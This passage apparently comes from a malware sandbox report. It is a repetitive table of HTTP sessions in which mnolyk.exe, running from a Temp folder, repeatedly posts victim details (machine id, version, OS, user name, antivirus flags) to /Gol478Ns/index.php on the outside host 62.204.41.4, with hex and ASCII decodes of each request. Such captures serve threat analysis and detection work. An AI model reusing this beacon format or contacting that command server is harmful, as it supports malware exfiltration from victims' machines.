                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:56.605768919 CET | 662 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      21 | 192.168.2.7 | 49745 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:02.707218885 CET | 453 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:02.771678925 CET | 453 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      210 | 192.168.2.7 | 49937 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:56.780040979 CET | 663 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:56.843110085 CET | 663 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      211 | 192.168.2.7 | 49938 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:57.008660078 CET | 664 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:57.075479031 CET | 664 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      212 | 192.168.2.7 | 49939 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:57.241621017 CET | 665 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:57.304322958 CET | 665 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      213 | 192.168.2.7 | 49940 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:57.476531029 CET | 666 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:57.538958073 CET | 666 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      214 | 192.168.2.7 | 49941 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:57.711370945 CET | 667 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:57.775655031 CET | 667 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      215 | 192.168.2.7 | 49942 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:57.946568966 CET | 668 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:58.011249065 CET | 668 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      216 | 192.168.2.7 | 49943 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:58.182255983 CET | 669 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:58.248070955 CET | 669 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      217 | 192.168.2.7 | 49944 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:58.418493032 CET | 670 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:58.481282949 CET | 670 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      218 | 192.168.2.7 | 49945 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:58.654499054 CET | 671 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:58.719652891 CET | 671 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      219 | 192.168.2.7 | 49946 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:58.902146101 CET | 672 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:58.966620922 CET | 672 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      22 | 192.168.2.7 | 49746 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:02.941803932 CET | 454 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:03.006386995 CET | 454 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      220 | 192.168.2.7 | 49947 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:59.148433924 CET | 673 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:59.213347912 CET | 673 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      221 | 192.168.2.7 | 49948 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:59.384504080 CET | 674 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:59.448514938 CET | 674 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      222 | 192.168.2.7 | 49949 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:59.621007919 CET | 675 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:59.684891939 CET | 675 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      223 | 192.168.2.7 | 49950 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:59.857429028 CET | 676 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:59.920886040 CET | 676 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      224 | 192.168.2.7 | 49951 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:00.088634014 CET | 677 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:00.157044888 CET | 677 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      225 | 192.168.2.7 | 49952 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:00.344242096 CET | 678 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:00.406126022 CET | 678 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
